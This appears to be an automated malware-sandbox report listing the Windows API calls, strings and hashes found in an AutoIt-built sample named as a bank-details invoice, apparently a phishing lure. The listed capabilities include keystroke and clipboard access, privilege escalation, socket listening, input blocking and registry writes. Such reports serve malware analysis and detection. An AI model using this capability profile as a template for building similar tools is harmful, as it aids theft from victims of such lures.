                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    APIs
                    Similarity
                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                    • String ID:
                    • API String ID: 1737998785-0
                    APIs
                      • Part of subcall function 004A9ABF: CLSIDFromProgID.OLE32 ref: 004A9ADC
                      • Part of subcall function 004A9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 004A9AF7
                      • Part of subcall function 004A9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 004A9B05
                      • Part of subcall function 004A9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 004A9B15
                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 004CC235
                    • _memset.LIBCMT ref: 004CC242
                    • _memset.LIBCMT ref: 004CC360
                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 004CC38C
                    • CoTaskMemFree.OLE32(?), ref: 004CC397
                    Strings
                    • NULL Pointer assignment, xrefs: 004CC3E5
                    Similarity
                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                    • String ID: NULL Pointer assignment
                    APIs
                      • Part of subcall function 004AB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004AB180
                      • Part of subcall function 004AB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004AB1AD
                      • Part of subcall function 004AB134: GetLastError.KERNEL32 ref: 004AB1BA
                    • ExitWindowsEx.USER32(?,00000000), ref: 004B7A0F
                    Similarity
                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                    • String ID: $@$SeShutdownPrivilege
                    APIs
                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004C8CA8
                    • WSAGetLastError.WSOCK32(00000000), ref: 004C8CB7
                    • bind.WSOCK32(00000000,?,00000010), ref: 004C8CD3
                    • listen.WSOCK32(00000000,00000005), ref: 004C8CE2
                    • WSAGetLastError.WSOCK32(00000000), ref: 004C8CFC
                    • closesocket.WSOCK32(00000000,00000000), ref: 004C8D10
                    Similarity
                    • API ID: ErrorLast$bindclosesocketlistensocket
                    • String ID:
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004B6554
                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 004B6564
                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 004B6583
                    • __wsplitpath.LIBCMT ref: 004B65A7
                    • _wcscat.LIBCMT ref: 004B65BA
                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 004B65F9
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                    • String ID:
                    Similarity
                    • API ID:
                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$Q
                    APIs
                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 004B13DC
                    Similarity
                    • API ID: lstrlen
                    • String ID: ($,2R$<2R$|
                    APIs
                      • Part of subcall function 004CA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 004CA84E
                    • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 004C9296
                    • WSAGetLastError.WSOCK32(00000000,00000000), ref: 004C92B9
                    Similarity
                    • API ID: ErrorLastinet_addrsocket
                    • String ID:
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 004BEB8A
                    • _wcscmp.LIBCMT ref: 004BEBBA
                    • _wcscmp.LIBCMT ref: 004BEBCF
                    • FindNextFileW.KERNEL32(00000000,?), ref: 004BEBE0
                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 004BEC0E
                    Similarity
                    • API ID: Find$File_wcscmp$CloseFirstNext
                    • String ID:
                    Similarity
                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                    • String ID:
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0048E014,75920AE0,0048DEF1,0050DC38,?,?), ref: 0048E02C
                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0048E03E
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetNativeSystemInfo$kernel32.dll
                    APIs
                      • Part of subcall function 0048B34E: GetWindowLongW.USER32(?,000000EB), ref: 0048B35F
                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 0048B22F
                      • Part of subcall function 0048B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0048B5A5
                    Similarity
                    • API ID: Proc$LongWindow
                    • String ID:
                    APIs
                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,004C43BF,00000000), ref: 004C4FA6
                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 004C4FD2
                    Similarity
                    • API ID: Internet$AvailableDataFileQueryRead
                    • String ID:
                    Similarity
                    • API ID: _memmove
                    • String ID: \QR
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 004BE20D
                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 004BE267
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 004BE2B4
                    Similarity
                    • API ID: ErrorMode$DiskFreeSpace
                    • String ID:
                    APIs
                      • Part of subcall function 0048F4EA: std::exception::exception.LIBCMT ref: 0048F51E
                      • Part of subcall function 0048F4EA: __CxxThrowException@8.LIBCMT ref: 0048F533
                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004AB180
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004AB1AD
                    • GetLastError.KERNEL32 ref: 004AB1BA
                    Similarity
                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                    • String ID:
                    APIs
                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004B6623
                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 004B6664
                    • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004B666F
                    Similarity
                    • API ID: CloseControlCreateDeviceFileHandle
                    • String ID:
                    APIs
                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004B7223
                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 004B723A
                    • FreeSid.ADVAPI32(?), ref: 004B724A
                    Similarity
                    • API ID: AllocateCheckFreeInitializeMembershipToken
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 004BF599
                    • FindClose.KERNEL32(00000000), ref: 004BF5C9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Similarity
                    • API ID: Find$CloseFileFirst
                    APIs
                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,004CBE6A,?,?,00000000,?), ref: 004BCEA7
                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,004CBE6A,?,?,00000000,?), ref: 004BCEB9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Similarity
                    • API ID: ErrorFormatLastMessage
                    APIs
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 004B4153
                    • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 004B4166
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Similarity
                    • API ID: InputSendkeybd_event
                    APIs
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004AACC0), ref: 004AAB99
                    • CloseHandle.KERNEL32(?,?,004AACC0), ref: 004AABAB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Similarity
                    • API ID: AdjustCloseHandlePrivilegesToken
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00496DB3,-0000031A,?,?,00000001), ref: 004981B1
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 004981BA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Similarity
                    • API ID: __itow__swprintf
                    APIs
                    • __time64.LIBCMT ref: 004BB6DF
                      • Part of subcall function 0049344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,004BBDC3,00000000,?,?,?,?,004BBF70,00000000,?), ref: 00493453
                      • Part of subcall function 0049344A: __aulldiv.LIBCMT ref: 00493473
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Similarity
                    • API ID: Time$FileSystem__aulldiv__time64
                    APIs
                    • BlockInput.USER32(00000001), ref: 004C6ACA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Similarity
                    • API ID: BlockInput
                    APIs
                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 004B750A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Similarity
                    • API ID: mouse_event
                    APIs
                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,004AAD3E), ref: 004AB124
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Similarity
                    • API ID: LogonUser
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Similarity
                    • API ID: NameUser
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0049818F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Similarity
                    • API ID: Exception@8Throwstd::exception::exception
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction ID: d650c7bd0b6332c5faa00e9121dd2a1f78bc38767be8519018972e849aa319cd
                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction Fuzzy Hash: BAC1B17220509309DF2D5639C47043FBAA15AA2BB131A0B7ED4B3CB6D5EF28D568D724
                    Memory Dump Source
                    • Source File: 00000000.00000002.2167173105.000000000133F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0133F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_133f000_confirm bank details invoice.jbxd
                    APIs
                    • DeleteObject.GDI32(00000000), ref: 004CA2FE
                    • DeleteObject.GDI32(00000000), ref: 004CA310
                    • DestroyWindow.USER32 ref: 004CA31E
                    • GetDesktopWindow.USER32 ref: 004CA338
                    • GetWindowRect.USER32(00000000), ref: 004CA33F
                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 004CA480
                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 004CA490
                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004CA4D8
                    • GetClientRect.USER32(00000000,?), ref: 004CA4E4
                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 004CA51E
                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004CA540
                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004CA553
                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004CA55E
                    • GlobalLock.KERNEL32(00000000), ref: 004CA567
                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004CA576
                    • GlobalUnlock.KERNEL32(00000000), ref: 004CA57F
                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004CA586
                    • GlobalFree.KERNEL32(00000000), ref: 004CA591
                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004CA5A3
                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,004FD9BC,00000000), ref: 004CA5B9
                    • GlobalFree.KERNEL32(00000000), ref: 004CA5C9
                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 004CA5EF
                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 004CA60E
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004CA630
                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004CA81D
                    Similarity
                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                    • String ID: $AutoIt v3$DISPLAY$static
                    APIs
                    • SetTextColor.GDI32(?,00000000), ref: 004DD2DB
                    • GetSysColorBrush.USER32(0000000F), ref: 004DD30C
                    • GetSysColor.USER32(0000000F), ref: 004DD318
                    • SetBkColor.GDI32(?,000000FF), ref: 004DD332
                    • SelectObject.GDI32(?,00000000), ref: 004DD341
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 004DD36C
                    • GetSysColor.USER32(00000010), ref: 004DD374
                    • CreateSolidBrush.GDI32(00000000), ref: 004DD37B
                    • FrameRect.USER32(?,?,00000000), ref: 004DD38A
                    • DeleteObject.GDI32(00000000), ref: 004DD391
                    • InflateRect.USER32(?,000000FE,000000FE), ref: 004DD3DC
                    • FillRect.USER32(?,?,00000000), ref: 004DD40E
                    • GetWindowLongW.USER32(?,000000F0), ref: 004DD439
                      • Part of subcall function 004DD575: GetSysColor.USER32(00000012), ref: 004DD5AE
                      • Part of subcall function 004DD575: SetTextColor.GDI32(?,?), ref: 004DD5B2
                      • Part of subcall function 004DD575: GetSysColorBrush.USER32(0000000F), ref: 004DD5C8
                      • Part of subcall function 004DD575: GetSysColor.USER32(0000000F), ref: 004DD5D3
                      • Part of subcall function 004DD575: GetSysColor.USER32(00000011), ref: 004DD5F0
                      • Part of subcall function 004DD575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 004DD5FE
                      • Part of subcall function 004DD575: SelectObject.GDI32(?,00000000), ref: 004DD60F
                      • Part of subcall function 004DD575: SetBkColor.GDI32(?,00000000), ref: 004DD618
                      • Part of subcall function 004DD575: SelectObject.GDI32(?,?), ref: 004DD625
                      • Part of subcall function 004DD575: InflateRect.USER32(?,000000FF,000000FF), ref: 004DD644
                      • Part of subcall function 004DD575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004DD65B
                      • Part of subcall function 004DD575: GetWindowLongW.USER32(00000000,000000F0), ref: 004DD670
                      • Part of subcall function 004DD575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004DD698
                    Similarity
                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                    APIs
                    • DestroyWindow.USER32 ref: 0048B98B
                    • DeleteObject.GDI32(00000000), ref: 0048B9CD
                    • DeleteObject.GDI32(00000000), ref: 0048B9D8
                    • DestroyIcon.USER32(00000000), ref: 0048B9E3
                    • DestroyWindow.USER32(00000000), ref: 0048B9EE
                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 004ED2AA
                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 004ED2E3
                    • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 004ED711
                      • Part of subcall function 0048B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0048B759,?,00000000,?,?,?,?,0048B72B,00000000,?), ref: 0048BA58
                    • SendMessageW.USER32 ref: 004ED758
                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 004ED76F
                    • ImageList_Destroy.COMCTL32(00000000), ref: 004ED785
                    • ImageList_Destroy.COMCTL32(00000000), ref: 004ED790
                    Similarity
                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                    • String ID: 0
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 004BDBD6
                    • GetDriveTypeW.KERNEL32(?,0050DC54,?,\\.\,0050DC00), ref: 004BDCC3
                    • SetErrorMode.KERNEL32(00000000,0050DC54,?,\\.\,0050DC00), ref: 004BDE29
                    Similarity
                    • API ID: ErrorMode$DriveType
                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                    APIs
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 004DC788
                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004DC83E
                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 004DC859
                    • SendMessageW.USER32(?,000000F1,?,00000000), ref: 004DCB15
                    Similarity
                    • API ID: MessageSend$Window
                    • String ID: 0
                    APIs
                    • CharUpperBuffW.USER32(?,?,0050DC00), ref: 004D6449
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                    APIs
                    • GetSysColor.USER32(00000012), ref: 004DD5AE
                    • SetTextColor.GDI32(?,?), ref: 004DD5B2
                    • GetSysColorBrush.USER32(0000000F), ref: 004DD5C8
                    • GetSysColor.USER32(0000000F), ref: 004DD5D3
                    • CreateSolidBrush.GDI32(?), ref: 004DD5D8
                    • GetSysColor.USER32(00000011), ref: 004DD5F0
                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 004DD5FE
                    • SelectObject.GDI32(?,00000000), ref: 004DD60F
                    • SetBkColor.GDI32(?,00000000), ref: 004DD618
                    • SelectObject.GDI32(?,?), ref: 004DD625
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 004DD644
                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004DD65B
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 004DD670
                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004DD698
                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 004DD6BF
                    • InflateRect.USER32(?,000000FD,000000FD), ref: 004DD6DD
                    • DrawFocusRect.USER32(?,?), ref: 004DD6E8
                    • GetSysColor.USER32(00000011), ref: 004DD6F6
                    • SetTextColor.GDI32(?,00000000), ref: 004DD6FE
                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004DD712
                    • SelectObject.GDI32(?,004DD2A5), ref: 004DD729
                    • DeleteObject.GDI32(?), ref: 004DD734
                    • SelectObject.GDI32(?,?), ref: 004DD73A
                    • DeleteObject.GDI32(?), ref: 004DD73F
                    • SetTextColor.GDI32(?,?), ref: 004DD745
                    • SetBkColor.GDI32(?,?), ref: 004DD74F
                    Similarity
                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                    APIs
                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 004DB7B0
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004DB7C1
                    • CharNextW.USER32(0000014E), ref: 004DB7F0
                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 004DB831
                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 004DB847
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004DB858
                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 004DB875
                    • SetWindowTextW.USER32(?,0000014E), ref: 004DB8C7
                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 004DB8DD
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 004DB90E
                    • _memset.LIBCMT ref: 004DB933
                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 004DB97C
                    • _memset.LIBCMT ref: 004DB9DB
                    • SendMessageW.USER32 ref: 004DBA05
                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 004DBA5D
                    • SendMessageW.USER32(?,0000133D,?,?), ref: 004DBB0A
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004DBB2C
                    • GetMenuItemInfoW.USER32(?), ref: 004DBB76
                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 004DBBA3
                    • DrawMenuBar.USER32(?), ref: 004DBBB2
                    • SetWindowTextW.USER32(?,0000014E), ref: 004DBBDA
                    Similarity
                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                    • String ID: 0
                    Similarity
                    • API ID: Window$Foreground
                    • String ID: ACTIVE$ALL$CLASS$H+R$HANDLE$INSTANCE$L+R$LAST$P+R$REGEXPCLASS$REGEXPTITLE$T+R$TITLE
                    • API String ID: 62970417-1561553379
                    APIs
                    • GetCursorPos.USER32(?), ref: 004D778A
                    • GetDesktopWindow.USER32 ref: 004D779F
                    • GetWindowRect.USER32(00000000), ref: 004D77A6
                    • GetWindowLongW.USER32(?,000000F0), ref: 004D7808
                    • DestroyWindow.USER32(?), ref: 004D7834
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 004D785D
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004D787B
                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 004D78A1
                    • SendMessageW.USER32(?,00000421,?,?), ref: 004D78B6
                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004D78C9
                    • IsWindowVisible.USER32(?), ref: 004D78E9
                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 004D7904
                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 004D7918
                    • GetWindowRect.USER32(?,?), ref: 004D7930
                    • MonitorFromPoint.USER32(?,?,00000002), ref: 004D7956
                    • GetMonitorInfoW.USER32 ref: 004D7970
                    • CopyRect.USER32(?,?), ref: 004D7987
                    • SendMessageW.USER32(?,00000412,00000000), ref: 004D79F2
                    Similarity
                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                    • String ID: ($0$tooltips_class32
                    • API String ID: 698492251-4156429822
                    APIs
                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 004B6CFB
                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004B6D21
                    • _wcscpy.LIBCMT ref: 004B6D4F
                    • _wcscmp.LIBCMT ref: 004B6D5A
                    • _wcscat.LIBCMT ref: 004B6D70
                    • _wcsstr.LIBCMT ref: 004B6D7B
                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 004B6D97
                    • _wcscat.LIBCMT ref: 004B6DE0
                    • _wcscat.LIBCMT ref: 004B6DE7
                    • _wcsncpy.LIBCMT ref: 004B6E12
                    Similarity
                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                    • API String ID: 699586101-1459072770
                    APIs
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0048A939
                    • GetSystemMetrics.USER32(00000007), ref: 0048A941
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0048A96C
                    • GetSystemMetrics.USER32(00000008), ref: 0048A974
                    • GetSystemMetrics.USER32(00000004), ref: 0048A999
                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0048A9B6
                    • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0048A9C6
                    • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0048A9F9
                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0048AA0D
                    • GetClientRect.USER32(00000000,000000FF), ref: 0048AA2B
                    • GetStockObject.GDI32(00000011), ref: 0048AA47
                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0048AA52
                      • Part of subcall function 0048B63C: GetCursorPos.USER32(000000FF), ref: 0048B64F
                      • Part of subcall function 0048B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0048B66C
                      • Part of subcall function 0048B63C: GetAsyncKeyState.USER32(00000001), ref: 0048B691
                      • Part of subcall function 0048B63C: GetAsyncKeyState.USER32(00000002), ref: 0048B69F
                    • SetTimer.USER32(00000000,00000000,00000028,0048AB87), ref: 0048AA79
                    Similarity
                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                    • String ID: AutoIt v3 GUI
                    • API String ID: 1458621304-248962490
                    APIs
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004D3735
                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0050DC00,00000000,?,00000000,?,?), ref: 004D37A3
                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 004D37EB
                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 004D3874
                    • RegCloseKey.ADVAPI32(?), ref: 004D3B94
                    • RegCloseKey.ADVAPI32(00000000), ref: 004D3BA1
                    Similarity
                    • API ID: Close$ConnectCreateRegistryValue
                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                    • API String ID: 536824911-966354055
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 004D6C56
                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 004D6D16
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                    • API String ID: 3974292440-719923060
                    APIs
                    • GetClassNameW.USER32(?,?,00000100), ref: 004ACF91
                    • __swprintf.LIBCMT ref: 004AD032
                    • _wcscmp.LIBCMT ref: 004AD045
                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 004AD09A
                    • _wcscmp.LIBCMT ref: 004AD0D6
                    • GetClassNameW.USER32(?,?,00000400), ref: 004AD10D
                    • GetDlgCtrlID.USER32(?), ref: 004AD15F
                    • GetWindowRect.USER32(?,?), ref: 004AD195
                    • GetParent.USER32(?), ref: 004AD1B3
                    • ScreenToClient.USER32(00000000), ref: 004AD1BA
                    • GetClassNameW.USER32(?,?,00000100), ref: 004AD234
